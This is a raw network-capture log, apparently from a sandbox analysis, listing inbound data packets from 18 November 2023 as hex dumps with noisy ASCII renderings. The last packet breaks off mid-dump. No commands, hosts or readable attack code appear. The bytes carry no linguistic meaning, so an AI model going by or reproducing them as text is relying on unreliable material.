2023-11-18 09:02:40 UTC	5146	IN	Data Raw: fc f9 95 48 b3 db 8f cf 04 3c eb b5 e5 0c b2 f4 5c e1 80 d4 d4 18 f5 96 90 3f 43 90 f3 1c 65 88 9a 19 b1 bc fe fd a7 19 5e 5e 3b 03 f2 52 62 79 85 eb 4c 8e 9d 12 b9 93 41 be a6 27 25 a6 bc 13 5e 72 21 2f a7 5e 1c 20 49 6c 66 d9 94 c4 fe e4 93 c8 10 0c 6e b6 89 a8 7c a0 c2 89 9b 1a 1f 9b 45 ca bb 8e f5 3c be 12 51 79 84 f3 b5 fc 6b 81 a8 7c f0 7a 40 9b 89 91 d7 03 61 96 7e 7c 33 2a 24 e5 2d 7c a8 53 47 53 f5 ba 20 61 67 d0 7f 0e e4 a6 10 fa 96 12 0a 7d 83 93 5d e6 0a 13 52 53 e3 84 2e 08 a9 bb a8 c1 f1 d3 bf d5 ab e9 9b b8 12 15 04 97 2d c2 44 ea 2e 0a 67 78 12 c7 ca 97 73 b0 ce 8f 27 d1 75 7e 56 58 f7 c7 c8 fd 15 50 13 03 8b be 74 cc 4f 2e fa 93 c5 79 34 c0 e9 e2 3c 20 c7 e9 15 d0 12 23 4c 77 3a 2e 05 92 b1 26 c8 e9 e2 55 42 6e 2a f6 16 47 c7 f2 ae ef 25 Data Ascii: H<\?Ce^^;RbyLA'%^r!/^ Ilfn\|E<Qyk\|z@a~\|3$-\|SGS ag}]RS.-D.gxs'u~VXPtO.y4< #Lw:.&UBnG%
2023-11-18 09:02:40 UTC	5162	IN	Data Raw: 50 c7 9c 00 24 1d 03 a1 3d ee a0 5d 87 1a e3 6e f3 e7 8c ab 3b 35 b5 c2 54 94 1d 0c a4 a6 16 3c 20 dc c1 d5 7c 88 5b 51 59 e8 0c fb 5a 3e c4 2d 96 5e 75 07 57 da 32 d6 7e b7 65 00 49 c7 8e 97 e0 dd 6b 20 2d 32 c8 79 99 cb 92 33 60 82 44 e6 48 3f ae 32 47 3e e4 7e a1 38 8f b6 e7 40 c3 0c 2c 19 7f 5d 89 8a 19 c7 6c 48 b4 cc 58 25 b7 e7 40 4d 8c 70 56 38 4d 55 4f 9f 28 ff 70 8c 67 40 d6 81 3c c2 29 d1 7c 76 c6 6f 33 77 c8 f8 6d ba 1f e1 1d 79 24 ba 3f 77 fb 15 37 60 47 c7 f6 f1 f5 f9 a1 a0 ba fc af 2b 91 74 dc 08 b5 d2 20 06 b2 0e e4 77 60 60 a1 90 74 c0 a9 dd b3 04 48 4d 55 b8 34 7f d6 e8 d6 e9 53 ea 6e f0 99 d0 84 03 d2 90 74 dc 92 b9 83 5d b7 64 41 36 57 06 32 92 8e 1e 35 00 7d ec 8b 14 ca 9a ed 3b 12 b9 74 7f d5 80 a4 63 20 64 4c f3 0a 48 fd 98 58 7d fc Data Ascii: P$=]n;5T< \|[QYZ>-^uW2~eIk -2y3`DH?2G>~8@,]lHX%@MpV8MUO(pg@<)\|vo3wmy$?w7`G+t w``tHMU4Snt]dA6W25};tc dLHX}
2023-11-18 09:02:40 UTC	5178	IN	Data Raw: c4 89 e5 c9 79 9c 9d 9c 7f fc f1 51 94 13 1b 71 62 53 be bd 09 9b 35 65 b3 f0 32 20 f2 32 20 26 6c 56 5e 06 04 5e 06 44 5e 06 c4 8c 73 ca cb 80 c0 cb 80 c8 cb 80 c0 cb 80 c8 cb 80 58 68 4e 29 37 a3 74 76 ca fc f8 de 3d e5 d9 6f da b7 54 94 27 b2 e9 ec 44 f6 e5 f3 47 51 8e 64 38 52 9e 5e 26 c7 39 79 8e e4 38 52 9e 5e a6 c0 91 f2 4c 31 05 8e 94 27 7d 29 e1 48 79 fe 96 ce ce df de fd c7 83 28 4f c5 52 85 23 e5 59 55 aa 70 4e f9 65 6c aa 71 a4 3c ab 4a 35 8e 94 27 48 a9 c1 91 f2 0c 24 b5 58 94 27 13 a9 c3 a2 3c 5a a7 1e 8b f2 70 98 06 2e ca b5 37 e0 da cb 83 54 1a f1 93 9b 87 9a 34 b6 54 94 47 8d 34 e1 9c 72 b7 9c 66 2e ca b7 37 e3 db cb ef 4c d2 82 23 e5 d7 1f 69 a1 55 5e 1d c9 e6 a3 ec 58 48 4c 53 97 1a 1a 67 5f 8a 36 ba e6 67 bf be 2f 54 72 7b 61 2c 56 92 Data Ascii: yQqbS5e2 2 &lV^^D^sXhN)7tv=oT'DGQd8R^&9y8R^L1'})Hy(OR#YUpNelq<J5'H$X'<Zp.7T4TG4rf.7L#iU^XHLSg_6g/Tr{a,V
2023-11-18 09:02:40 UTC	5194	IN	Data Raw: 97 da 8f 97 b4 1f 2f b5 1f 2f df 27 fc fb a0 fd 78 49 fd 2f d5 ff 92 f6 e3 a5 fa 5f fe e4 7f ff 67 7f 9a df 87 3e bf ab ff 25 f5 bf 54 ff cb 0f cd 4f fd 2f a9 ff a5 fa 5f 7e 4e f6 be 7e aa ff e5 07 e6 57 ea 7f 75 83 f9 95 fa 5f 51 ff 2b f5 bf ba 41 0f 2f f5 bf a2 fe 57 ea 7f 75 3b e8 f1 dd 75 bb 27 dd df a9 db c1 f7 f9 4a fd af a8 ff 95 fa 5f 2d f8 f7 af d4 ff 8a fa 5f a9 ff d5 82 fd 5c a5 fe 57 d4 ff 4a fd af d6 41 8f 4f f3 a3 fe 57 ea 7f b5 e0 fd b3 d4 ff 8a fa 5f a9 ff d5 86 7e 5b ea 7f 45 fd af d4 ff 6a 27 dd 9f e6 47 fd af d4 ff 8a fa 5f a9 ff 15 f5 bf 52 ff ab 4d af 3f f5 bf a2 fe 57 ea 7f 15 37 f6 29 d8 52 ff 2b ea 7f a5 fe 57 74 7d cc 52 ff 2b ea 7f a5 fe 57 d4 ff 4a fd af a8 ff 95 fa 5f c5 c9 ea 59 a5 fe 57 d4 ff 4a fd af 92 5e 7f ea 7f 45 fd af Data Ascii: //'xI/_g>%TO/_~N~Wu_Q+A/Wu;u'J_-_\WJAOW_~[Ej'G_RM?W7)R+Wt}R+WJ_YWJ^E
2023-11-18 09:02:40 UTC	5226	IN	Data Raw: 76 65 0b 1e 9f 62 57 86 ed ca c4 ae 6c a1 6b ed 4c ec ca b0 5d 99 d8 95 e1 3a 3a 13 bb 32 6c 57 26 76 65 2b 7d 8f 8b 89 5d 19 b6 2b 13 bb b2 15 8f 4f b1 2b c3 76 65 62 57 b6 d2 b9 a0 89 5d 19 b6 2b 13 bb b2 35 f0 b1 95 fe c4 76 65 62 57 76 bf d1 6b 82 d8 95 61 bb 32 b1 2b c3 ef 11 35 b1 2b c3 76 65 62 57 76 65 57 ff 1a db 94 fe c4 76 65 62 57 76 0f 98 07 33 b1 2b c3 76 65 62 57 86 df 23 6a 62 57 06 ed ea b5 a5 f4 27 fe d6 9f 89 5d 19 ae a3 33 a9 a3 33 fc 1e 51 93 3a 3a c3 5e 66 e2 65 f6 08 38 e7 35 f1 32 c3 5e 66 e2 65 b6 d1 b5 93 26 5e 66 d8 cb 4c bc cc 36 ba 56 c0 c4 cb 0c 7b 99 89 97 d9 86 fb 53 bc cc b0 97 99 78 99 61 2f 33 f1 32 c3 5e 66 e2 65 b6 e3 eb ad 78 99 61 2f 33 f1 32 db f1 fc 53 bc cc b0 97 99 78 99 ed 3b 74 41 93 3a 3a c3 75 74 26 75 74 76 Data Ascii: vebWlkL]::2lW&ve+}]+O+vebW]+5vebWvka2+5+vebWveWvebWv3+vebW#jbW']33Q::^fe852^fe&^fL6V{Sxa/32^fexa/32Sx;tA::ut&utv
2023-11-18 09:02:40 UTC	5242	IN	Data Raw: c1 cc 31 98 dd cf b0 94 d9 eb c4 f3 e9 18 cc 70 ba cd 1c 83 19 66 30 73 0c 66 03 ef d9 8e c1 0c 27 f9 cc 65 f9 6c 6e 54 a7 cb f3 19 e6 3e 73 dc 67 13 f7 d3 71 9f 61 ee 33 c7 7d 76 e1 f9 f4 dc 87 13 8c e6 32 8c 76 3f c3 92 5c d7 cf 8b f6 33 6e ae 1a 94 fd b2 e3 47 cb a0 92 15 eb 6c 4e e7 cb b8 ec 7f 44 d2 e9 c4 fd 0c be ea 95 ee 2b 6f 2d 55 27 66 ea e8 98 3a 86 86 75 ba 7e 62 a6 8e 8e a9 a3 6d d0 f7 45 c7 d4 d1 70 3f dd 97 d2 ef cf ac a4 d8 5c 3f 79 11 b3 af 62 8e 78 3e a3 eb 27 ce 19 47 97 33 8e 91 b2 66 74 39 e3 88 63 87 e8 62 87 f8 32 76 f8 f5 17 91 74 3a f1 d8 ba fc 6d cc 78 6c 5d fe 36 e2 d8 21 ba d8 21 16 1a 97 45 17 3b 44 1c 3b 44 17 3b c4 82 d7 a7 8b 1d 22 8e 1d a2 8b 1d 22 8e 1d a2 8b 1d 22 8e 1d a2 8b 1d de 9e e1 6f e3 bd b5 94 da 94 88 63 87 e8 Data Ascii: 1pf0sf'elnT>sgqa3}v2v?\3nGlND+o-U'f:u~bmEp?\?ybx>'G3ft9cb2vt:mxl]6!!E;D;D;"""oc
2023-11-18 09:02:40 UTC	5258	IN	Data Raw: bf f5 95 3f 5f 35 d1 a7 f6 95 0e 5f e9 e5 23 3d bb c3 57 ba f6 95 0e 5f e9 a5 da ef 27 7c a5 eb 3c be 23 8f ef d5 ee c3 e8 c8 e3 bb ce c6 3b b2 f1 ae df af d9 91 8d 77 ed 48 1d 8e d4 9b 75 c1 ce 9f 6a d5 8e d4 e1 48 5d ef 8f ef c8 c6 bb ff 7d 58 fe 40 ac 7e 47 4e e7 4f c4 6a 47 ea 70 a4 ae 1d a9 c3 91 ba 76 a4 0e 47 ea fa f7 00 3a 1c a9 6b 47 ea 70 a4 3e ed 33 e1 1d 8e d4 b5 23 75 38 52 d7 8e d4 e1 48 5d 3b 52 87 23 f5 65 df 13 d1 e1 48 5d 3b 52 87 23 75 ed 48 1d 8e d4 b5 23 75 38 52 d7 8e d4 e1 48 5d 3b 52 87 23 f5 6d 33 c6 0e 47 ea da 91 3a 1c a9 6b 47 ea 70 a4 ae 1d a9 c3 91 ba 76 a4 0e 47 ea c7 f6 39 e0 48 e3 63 bf 9f e3 83 9f ab d6 8e 34 e0 48 43 3b d2 80 23 0d ed 48 03 8e 34 c2 47 f2 d0 80 23 0d ed 48 03 8e 34 f4 3e a9 01 47 1a da 91 06 1c 69 7c bf Data Ascii: ?_5_#=W_'\|<#;wHujH]}X@~GNOjGpvG:kGp>3#u8RH];R#eH];R#uH#u8RH];R#m3G:kGpvG9Hc4HC;#H4G#H4>Gi\|
2023-11-18 09:02:40 UTC	5274	IN	Data Raw: 67 4a c6 bb a0 e3 5e b8 f7 56 f3 cd dd b7 e6 c4 63 2b 40 b7 5f 58 6f 05 e9 76 cc 74 bb 40 dd 7e e1 3a 05 eb 76 cc 75 bb 80 dd 8e c9 6e 17 b4 db 31 db ed 02 77 3b dc 4a fd fa 49 c9 89 eb 14 c0 db 2b be 9f 82 78 7b c5 75 56 a9 b3 b2 e9 c5 d7 4f 4a 4e 5c a7 49 9d 86 ef a7 49 9d 98 65 77 81 d9 dd 70 9d 82 b3 bb e1 3a 9b d4 d9 28 61 ee 4d ea c4 0c bd 0b 44 ef ad d0 59 47 c1 e8 1d 73 ed 2e 60 bb 63 b2 dd bb e6 c4 63 eb 32 b6 8e 9f 21 97 b1 c5 3c bd 0b 50 ef ce 96 5b 5f 3f b9 e4 0c 98 6f 83 f0 6d d8 e8 73 1b 36 cd 49 c7 36 08 df 06 cc b7 41 f8 36 60 be 0d c2 b7 61 c7 75 0a df 06 3e 7f ad 13 d8 0f b7 35 7f fe 71 89 5c 73 62 be 0d c2 b7 21 6e 3b ac 33 ce af 4e 78 f9 37 1e 5b e1 db 10 e9 73 1b 84 6f 03 e6 db 20 7c 1b e0 d7 c7 be 7e 52 72 e2 b1 15 be 0d c7 46 eb 14 Data Ascii: gJ^Vc+@_Xovt@~:vun1w;JI+x{uVOJN\IIewp:(aMDYGs.`cc2!<P[_?oms6I6A6`au>5q\sb!n;3Nx7[so \|~RrF
2023-11-18 09:02:40 UTC	5306	IN	Data Raw: 5b 3f 09 4e 93 c5 3e ac ef ab ea e6 e1 40 03 1c 68 1e 0e 34 c0 81 d6 f4 6d b1 01 0e 34 0f 07 1a e0 40 f3 70 a0 01 0e 34 0f 07 1a e0 40 f3 06 cc 06 38 d0 3c 1c 68 80 03 cd c3 81 06 38 d0 3c 1c 68 80 03 ad 6b 91 ab 01 0e 34 0f 07 1a e0 40 eb ea 83 f5 ef 4d 31 9a 5f 37 c0 81 e6 e1 40 03 1c 68 1e 0e 34 c0 81 e6 e1 40 03 1c 68 1e 0e 34 c0 81 16 da f0 dc 00 07 9a 87 03 0d 70 a0 79 38 d0 00 07 9a 37 60 36 18 30 9b 37 60 36 18 30 5b fa 99 4c cc 64 0e 8b da 5f 9a 62 34 3f 93 b0 7b b6 d4 0f 4f 2d 39 93 7e 07 00 b3 b4 a1 13 43 1a 30 4b f3 98 a5 01 b3 b4 d7 63 79 5b 04 66 69 de ee d9 60 f7 6c 8f ed 9e bf fe e3 b3 1b 46 f3 eb 06 a8 d3 46 f9 73 c3 ba 8d bb 1e 6d 62 dd a6 7e 11 6b 13 eb e6 11 52 03 42 6a 53 1b c2 1a 10 52 f3 08 a9 01 21 b5 e9 f7 1b 10 52 f3 08 a9 01 21 Data Ascii: [?N>@h4m4@p4@8<h8<hk4@M1_7@h4@h4py87`607`60[Ld_b4?{O-9~C0Kcy[fi`lFFsmb~kRBjSR!R!
2023-11-18 09:02:40 UTC	5322	IN	Data Raw: c5 01 bc ff fb 03 bd 6e 2f bd 6e ff b9 d7 6f bf a2 d7 fd a5 d7 e3 df d5 d0 30 8b 7e 85 a0 be c8 ba fa 15 82 fa 22 cb f3 bb 05 7e b7 ae da b3 b1 c0 ef 96 27 6a 0b 44 6d dd 9a f5 7d 2f 10 b5 e5 89 da 02 51 5b 37 7d df 5e 20 6a cb 73 a0 05 0e b4 7c b5 e5 75 67 34 7f d5 02 07 5a be 76 c4 02 07 5a 9e 03 2d 70 a0 d5 76 fb 86 bf c0 81 96 f7 d8 2e 78 6c 57 d3 6a d8 82 c7 76 79 ea b4 40 9d 56 2b 3f 36 e4 cd 53 a7 05 ea b4 ba 7e 2a 5f a0 4e cb 53 a7 05 ea b4 ba f6 da 2c 50 a7 e5 3d b6 0b 1e db d5 b5 86 b3 e0 b1 5d 9e 71 2d 30 ae 8f df a7 d3 69 13 b7 8e ef 4d 4f 9f fb 9e c4 35 f6 7b d3 f3 4b df f3 d6 9b 8c fb ad 69 ff dc b7 9b ec ff d9 34 5e fb 7e a5 9b 7c 8a 7b db 5e e7 ea 7c 73 eb e0 d1 f4 fe b9 ef 57 57 a9 4f 7f 73 fb dc 77 e9 bf f9 b2 7d ea 7b 79 fc 8f b7 a7 1b Data Ascii: n/no0~"~'jDm}/Q[7}^ js\|ug4ZvZ-pv.xlWjvy@V+?6S~*_NS,P=]q-0iMO5{Ki4^~\|{^\|sWWOsw}{y
2023-11-18 09:02:40 UTC	5338	IN	Data Raw: 66 ed f5 a1 a1 0f ed b7 33 6b e8 43 7b 7d 68 e8 43 a7 4e b1 1b fa d0 5e 1f 1a fa d0 be 01 d1 d0 87 f6 fa d0 d0 87 f6 fa d0 d0 87 f6 fa d0 d0 87 4e 7f de a0 0f ed 3d a0 e1 01 5d da 71 1a 1e d0 de 03 1a 1e d0 35 7e 34 cc a4 ef 07 34 fa 01 ed 6f e2 d2 c5 99 f4 57 00 fa 01 dd 3a 31 6c f4 03 da 5b 47 c3 3a ba fd 37 05 58 47 7b eb 68 58 47 b7 3f 6f b0 8e f6 d6 d1 b0 8e ee a7 7f 6e 38 6f de 3a 1a d6 d1 e3 3f 71 60 1d ed ad a3 61 1d ed b7 33 6b 58 47 7b 7d 68 e8 43 fb 36 42 43 1f da eb 43 43 1f 7a eb 86 5f 43 1f da eb 43 43 1f 7a 8f 5d a7 d0 d0 87 f6 fa d0 d0 87 de fe db eb e6 4c fa d7 24 f4 a1 7d 3f a0 a1 0f ed f5 a1 a1 0f 7d fc b7 20 e8 43 7b 7d 68 e8 43 fb 7e 40 43 1f da 7b 40 c3 03 fa f2 ef ca f0 80 f6 1e d0 f0 80 be fc 4c c2 03 da af d8 6f ac d8 ef 6b f4 6f Data Ascii: f3kC{}hCN^N=]q5~44oW:1l[G:7XG{hXG?on8o:?q`a3kXG{}hC6BCCCz_CCCz]L$}?} C{}hC~@C{@Loko
2023-11-18 09:02:40 UTC	5370	IN	Data Raw: e8 32 c7 5e e0 98 fc 28 ba ce b1 2f d6 e7 ff fe eb 31 f6 3a c7 5e 79 de 6d 8a ad a2 fd 3b af 1b 2f 5f 68 a6 71 f5 c3 0b 4d ec 3c ef bc 6b 8c c2 79 e7 f5 ea e3 17 38 ef 32 cf a3 85 e7 9d d7 ba 3a f3 79 74 9e e7 d1 f9 d4 68 ff 9e e7 79 74 3e 05 ff 9b 97 39 f6 cc ff e6 cb 1c 7b a1 e3 f9 3c cf 85 f3 69 e5 79 af 73 ec 95 b7 d5 36 c7 6e 3c ef 6d 8e bd fd ff b1 7f fc f3 18 bb cf b1 3b dc fd 7e 14 ed 53 2c 9f bf f3 33 b4 5e ee d7 8f 63 63 de b0 7f fc 02 e7 bd ce f3 e8 ea 3c 6f cc b1 78 3f 59 d7 65 8e bd f0 bc eb 1c bb 06 ae ef 3a cd a3 eb b5 e8 33 e5 ba cd 79 f9 1a 7b 9d d7 d8 eb cb f7 f2 5f 0f b1 f3 1a bb f1 3e da e6 3e da a2 68 5b 6d 73 1f 6d bc 8f b6 b9 8f 36 ac b3 d4 76 9d 63 79 3b 6f 73 3b 6f 3b 38 39 fe 59 74 6e e7 5b e1 bc 3f bc 86 ee 0d 3f 53 f6 36 3d 53 Data Ascii: 2^(/1:^ym;/_hqM<ky82:ythyt>9{<iys6n<m;~S,3^cc<ox?Ye:3y{_>>h[msm6vcy;os;o;89Ytn[??S6=S
2023-11-18 09:02:40 UTC	5386	IN	Data Raw: c8 91 7e be 7c 4f be d8 93 7a e4 0a e4 48 c7 9b 7e 07 04 72 a4 c3 53 ec 00 c5 fe fd b7 3c b7 00 c5 0e 4f b1 03 14 3b 3c c5 0e 50 ec f0 14 3b 40 b1 e3 6d 7c 4f 0e a2 f9 eb 86 b5 37 c2 ef cc 1a 58 7b 23 3c 33 0f 30 f3 f0 cc 3c c0 cc c3 33 f3 00 33 0f cf cc 03 cc 3c 3c 33 0f 30 f3 2f bf df 75 b4 79 7c 6f e6 af 1b 98 79 dc f5 4c 21 c0 cc c3 33 f3 00 33 8f bb fe ee 0e 30 f3 f0 cc 3c c0 cc c3 33 f3 00 33 0f cf cc 03 cc 3c ee e3 7b 12 cf 9b cf ff 0e e4 7f 87 5f 7b 23 90 8b 1d 9e d0 07 08 7d 78 42 1f 20 f4 e1 09 7d 80 d0 87 27 f4 01 42 1f 9e d0 07 08 7d bc 8f b5 46 01 42 1f 5f 51 fb 87 88 f6 8d ca 5f da 8a 89 57 00 d3 87 4f c8 0e 24 64 c7 c3 0f 96 48 c8 0e 2f 05 02 52 20 bc 14 08 48 81 f0 52 20 20 05 c2 6f 3d 1b 0f 5e 3c ff d0 41 0a 84 4f c8 0e 48 81 f0 52 20 20 Data Ascii: ~\|OzH~rS<O;<P;@m\|O7X{#<30<33<<30/uy\|oyL!330<33<{_{#}xB }'B}FB_Q_WO$dH/R HR o=^<AOHR
2023-11-18 09:02:40 UTC	5402	IN	Data Raw: 5c cb 93 a7 05 f2 b4 3c 79 5a 20 4f cb d3 99 05 3a b3 3c 9d 59 87 a3 f9 23 09 5e f2 db df 0f 71 18 ef 6f 1f 35 e2 56 f2 df 08 ca b2 3c f7 58 e0 1e cb 73 8f 05 ee b1 ae 3e 22 1b 24 62 3f f4 32 15 1b 24 62 fb f9 f3 c6 fc 79 fb c5 5f 37 e6 cf db cf 68 37 66 b4 db 37 b2 6f cc 68 b7 9f 63 6e cc 31 f7 53 b7 26 6c cc 31 b7 2f 01 dc 28 01 dc 7e 39 d6 8d 12 c0 ed 67 46 1b 33 a3 fd f2 a3 bd 38 9a 3f 92 98 ab ec f7 c3 2e 00 be 31 57 d9 7e f6 b0 31 7b d8 7e f6 b0 31 7b d8 be 21 7a a3 21 7a 37 fd c6 df 68 88 de 7e f6 b0 31 7b d8 7e f6 b0 31 7b d8 7e f6 b0 31 7b d8 a1 df c1 1b b3 87 ed 67 0f 1b b3 87 ed 67 0f 1b b3 87 ed 67 0f 1b b3 87 9d ba 0c 7c 63 f6 b0 fd ec 61 63 f6 b0 fd ec 61 63 f6 b0 fd ec 61 63 f6 b0 fd ec 61 63 f6 b0 fd ec 61 63 f6 b0 fd ec 61 63 f6 b0 7d 9e Data Ascii: \<yZ O:<Y#^qo5V<Xs>"$b?2$by_7h7f7ohcn1S&l1/(~9gF38?.1W~1{~1{!z!z7h~1{~1{~1{ggg\|cacacacacacac}
2023-11-18 09:02:40 UTC	5418	IN	Data Raw: 2f aa 02 51 15 1f ac 14 88 aa 78 51 15 88 aa 78 51 15 88 aa 78 51 15 88 aa 78 51 15 88 aa 78 51 15 88 aa f8 60 a5 40 54 c5 07 2b 05 a2 2a 5e 54 05 a2 2a 3e 58 a9 10 55 f5 c1 4a 85 a8 aa 17 55 85 a8 aa 17 55 85 a8 aa 17 55 85 a8 aa 17 55 85 a8 aa 17 55 85 a8 aa 17 55 85 a8 aa 17 55 c5 e0 b1 7a eb 73 b2 02 62 d5 43 ac 02 62 d5 e7 31 15 10 ab 1e 62 15 a2 aa 49 3f 0b aa 10 55 f5 a2 aa 10 55 f5 a2 aa 10 55 cd fe 00 40 54 d5 8b aa 42 54 35 37 bf 37 d4 e6 83 95 0a 51 55 2f aa 0a 51 55 2f aa 0a 51 55 2f aa 0a 51 55 2f aa 0a 51 55 2f aa 0a 51 55 9f c7 54 88 aa 7a 51 55 88 aa be b1 a0 32 57 54 7e 63 49 65 ae a9 ec 69 54 b9 aa f2 1b cb 2a 73 5d 65 4f a3 0a e3 54 9f e3 54 18 a7 fa 1c a7 c2 38 d5 1b a7 c2 38 f5 73 db b7 e2 1a a0 af 7f f8 d3 b6 df fe f6 c7 b6 d7 ff dd Data Ascii: /QxQxQxQxQxQ`@T+^T>XUJUUUUUUUzsbCb1bI?UUU@TBT577QU/QU/QU/QU/QU/QUTzQU2WT~cIeiT*s]eOTT88s
2023-11-18 09:02:40 UTC	5428	IN	Data Raw: c6 ed 65 09 b2 f4 c7 ff fd 80 fa 3f fd eb bf 41 73 43 e5 af 11 78 4b 1e 6f 09 9c 4a eb 0b 19 be 48 cf a9 04 4e 25 cf a9 04 4e 25 cf a9 04 4e 25 cf a9 04 4e 25 cf 29 3c f4 77 fc 43 7f af 53 2b 64 3e 1a 38 95 7f 72 4a a9 10 cc 63 2a 03 53 d9 63 2a 03 53 d9 63 2a 03 53 d9 37 46 19 98 ca 1e 53 19 98 ca 7e 70 2c 83 37 d9 f3 26 03 1c 39 7f 21 c3 67 f3 e0 c8 00 47 f6 e0 c8 00 47 f6 e0 c0 e3 ab c7 3f be fa 3a 15 d1 3c 6f 32 78 93 3d 6f 32 78 93 5b b3 55 49 06 6f b2 e7 4d 06 6f b2 e7 4d 06 6f b2 1f e5 ca 68 8c b2 27 47 06 39 b2 9f 44 c8 68 8c b2 6f 8c 32 80 93 3d 70 32 80 93 3d 70 32 80 93 3d 70 32 80 93 3d 70 32 80 93 3d 70 32 80 93 3d 70 f0 dc f7 f1 cf 7d bf 4e ad 90 f9 68 00 4e f1 8d 51 01 71 8a 27 4e 01 71 8a 27 4e 01 71 8a 27 4e 01 3a 8a 47 47 01 3a 8a 47 47 Data Ascii: e?AsCxKoJHN%N%N%N%)<wCS+d>8rJcScSc*S7FS~p,7&9!gGG?:<o2x=o2x[UIoMoMoh'G9Dho2=p2=p2=p2=p2=p2=p}NhNQq'Nq'Nq'N:GG:GG
2023-11-18 09:02:40 UTC	5444	IN	Data Raw: 9d a8 ae 93 ea 3a 51 5d 27 d5 75 a2 ba 4e aa eb d4 28 a3 cf 56 12 ad 85 a4 b5 90 68 2d 24 ad 85 44 6b 21 69 2d 24 aa d1 ac 1a cd b7 fb 01 21 15 5c a6 82 cb 2a b8 4c 05 97 55 70 99 0a 2e eb 0b 24 32 35 df ac 22 cd 54 a4 59 45 9a a9 48 b3 8a 34 53 c1 65 15 5c a6 82 cb 2a b8 4c c5 93 55 3c 99 8a a7 a8 78 0a 35 b8 a2 06 57 a8 c1 15 d5 5b a1 7a 2b aa b7 42 f5 56 54 6f 85 ea ad a8 de ca 85 de 5e 9b 97 a2 7a 2b 54 3b 45 b5 53 a8 c1 15 35 b8 42 f5 56 54 6f 85 ea ad a8 de 0a 35 b8 a2 06 57 a8 46 8b 2e dc 85 2e dc 45 17 ee 4a f5 56 55 6f 95 ea ad aa de 2a d5 5b 55 ed 54 ea 55 55 b5 53 a9 57 55 f5 aa 4a f5 56 55 6f 95 ea ad aa de 2a d5 5b 55 bd 55 aa b7 aa 7a ab 54 3b 55 fd ad d2 8d 62 55 bd 55 aa b7 aa 7a 6b 54 6f 4d f5 d6 02 f4 90 a6 7a 6b 54 6f 4d fd ad 51 7f 6b Data Ascii: :Q]'uN(Vh-$Dk!i-$!\LUp.$25"TYEH4Se\LU<x5W[z+BVTo^z+T;ES5BVTo5WF..EJVUo[UTUUSWUJVUo[UUzT;UbUUzkToMzkToMQk
2023-11-18 09:02:40 UTC	5476	IN	Data Raw: df 23 2d 20 62 b1 b4 07 04 b2 b6 62 5d be 19 06 60 e9 4f 00 02 90 16 1e d2 02 90 16 3e 6b 2b 00 69 11 fe 05 1a 90 16 a1 3d 20 00 69 11 fe c6 01 a4 85 4f f6 0a 40 5a 78 48 0b 40 5a f8 aa 89 81 64 af f0 9b 9d 05 fc 2d 7c d5 c4 80 bf 45 f8 07 1e 72 c4 62 3f f4 94 0f b6 8b 7d da 15 fa 00 db 85 af 9a 18 60 bb f0 9b 9d 05 d8 2e 7c d5 c4 00 db 85 af 9a 18 60 bb d8 e9 4f 12 e3 e6 73 c4 02 fe 16 3e 47 2c e0 6f 91 fe 39 09 7f 8b d4 1e 10 f0 b7 48 3f 6e f0 b7 48 0d d7 01 7f 0b bf d9 59 c0 df 22 f5 07 3e 01 7f 8b f4 eb 25 f0 b7 f0 39 62 01 7f 0b ef 6f 01 7f 8b 7a e9 27 17 fc 2d bc bf 05 fc 2d ca 2f b3 c0 df c2 fb 5b c0 df c2 a7 96 05 fc 2d ca 3f 27 e1 6f e1 fd 2d e0 6f d1 fa f3 86 80 bf 85 f7 b7 80 bf 45 7f 74 80 01 7f 0b 5f a3 31 e0 6f d1 fe 39 09 7f 0b 5f a3 31 e0 Data Ascii: #- bb]`O>k+i= iO@ZxH@Zd-\|Erb?}`.\|`Os>G,o9H?nHY">%9boz'--/[-?'o-oEt_1o9_1
2023-11-18 09:02:40 UTC	5492	IN	Data Raw: 4d 88 6a 7a 51 4d 88 6a 7a 51 4d 88 6a 7a 51 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d d0 68 7a 1a 4d 60 65 7a ac 4c a8 63 7a 75 4c e4 9f e9 f3 cf 04 56 a6 c7 ca 04 56 a6 c7 ca 04 56 a6 c7 ca 04 56 a6 c7 ca 04 56 a6 c7 ca 02 56 96 c7 Data Ascii: MjzQMjzQMjzQMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzMhzM`ezLczuLVVVVVV
2023-11-18 09:02:40 UTC	5508	IN	Data Raw: c4 0e 20 76 3c c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 44 75 bd a8 2e 7e b5 75 fd af b6 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 76 3d c4 2e 20 